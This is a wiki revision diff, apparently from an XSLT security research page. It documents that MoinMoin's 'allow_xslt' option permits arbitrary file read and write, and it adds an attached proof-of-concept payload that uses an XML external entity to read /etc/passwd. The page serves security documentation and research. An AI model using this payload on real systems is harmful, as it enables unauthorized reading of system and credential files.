Changes for page Application_MoinMoin

Last modified by Nicolas Gregoire on 2012/01/29 17:56

From 3.1 to 4.1

From version 1.1

edited by Nicolas Gregoire
on 2012/01/24 21:10

Change comment: There is no comment for this version

To version

edited by Nicolas Gregoire
on 2012/01/24 22:08

Change comment: Upload new attachment XsltReadFile

Summary

Page properties

Content

@@ -1,5 +1,6 @@
--By default, the 'allow_xslt' configuration option is set to False. if this option is set to True, then "read/write/overwrite arbitrary path/file as the moin process uid/gidarbitrary" is possible. This is by inserting then displaying wiki pages containing XSLT code.
++By default, the 'allow_xslt' configuration option is set to False. if this option is set to True, then "read/write/overwrite arbitrary path/file as the moin process uid/gidarbitrary" is possible. This is triggered by inserting then displaying wiki pages containing XSLT code.
++
  This was documented in version 1.9.3 :
  http://moinmo.in/SecurityFixes
  http://hg.moinmo.in/moin/1.9/rev/99e2309a7ec0

XsltReadFile

Author

...	...	@@ -1,0 +1,1 @@
	1	+xwiki:XWiki.NicolasGregoire

Size

...	...	@@ -1,0 +1,1 @@
	1	+313 bytes

Content

@@ -1,0 +1,12 @@
++<?xml version="1.0"?>
++<!DOCTYPE doc [
++<!ENTITY xee SYSTEM "file:///etc/passwd">
++]>
++<?xml-stylesheet href="XsltReadFile" type="text/xml"?>
++<xsl:stylesheet version="1.0"
++xmlns:xsl="http://www.w3.org/1999/XSL/Transform" >
++   <xsl:template match="/">
++      File content : [&xee;]
++   </xsl:template>
++</xsl:stylesheet>
++